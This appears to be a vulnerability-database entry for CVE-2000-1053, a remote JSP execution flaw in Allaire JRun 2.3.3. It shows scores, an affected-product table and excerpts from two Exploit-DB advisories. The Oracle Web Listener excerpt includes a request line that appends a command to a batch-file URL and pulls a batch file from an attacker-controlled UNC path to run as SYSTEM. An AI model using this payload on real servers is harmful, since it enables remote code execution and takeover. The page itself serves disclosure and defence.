CVE-2000-1053
published 2000-12-11CVE-2000-1053: Allaire JRun 2.3.3 server allows remote attackers to compile and execute JSP code by inserting it via a cross-site scripting (CSS) attack and directly calling…
PriorityP431critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
5.99%
92.4th percentile
Allaire JRun 2.3.3 server allows remote attackers to compile and execute JSP code by inserting it via a cross-site scripting (CSS) attack and directly calling the com.livesoftware.jrun.plugins.JSP JSP servlet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| macromedia | jrun | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Allaire JRun 2.3 - Arbitrary Code Execution
exploitdb·2000-10-23
CVE-2000-1053 Allaire JRun 2.3 - Arbitrary Code Execution
Allaire JRun 2.3 - Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/1831/info
Jrun contains a vulnerability that allows a user to compile and execute JSP code from an arbitrary file on the webserver's filesystem. This bug is due to the way JSP execution is invoked -- if a requested filename/path is prefixed with '/servlet/'. If a user specifies "../" paths as part of a "/servlet/" request, it is possible to access documents outside of the webroot.
The document specified (the complete path must be known by the attacker) will then be compiled and executed as a JSP script. This can be a serious vulnerability if an attacker can send user-input to a file on the filesystem. An example of this is a guestbook application - a malicious user could put JSP code into a guest
Exploit-DB
Oracle Web Listener 4.0.x - for NT Batch File
exploitdb·2000-03-15
CVE-2000-0169 Oracle Web Listener 4.0.x - for NT Batch File
Oracle Web Listener 4.0.x - for NT Batch File
---
source: https://www.securityfocus.com/bid/1053/info
Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default.
Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even neccessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code.
http: //target/ows-bin/*.bat?&\\attacker\getadmin.bat
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=97236125107957&w=2http://www.allaire.com/handlers/index.cfm?ID=17969&Method=Fullhttps://exchange.xforce.ibmcloud.com/vulnerabilities/5406http://marc.info/?l=bugtraq&m=97236125107957&w=2http://www.allaire.com/handlers/index.cfm?ID=17969&Method=Fullhttps://exchange.xforce.ibmcloud.com/vulnerabilities/5406
2000-12-11
Published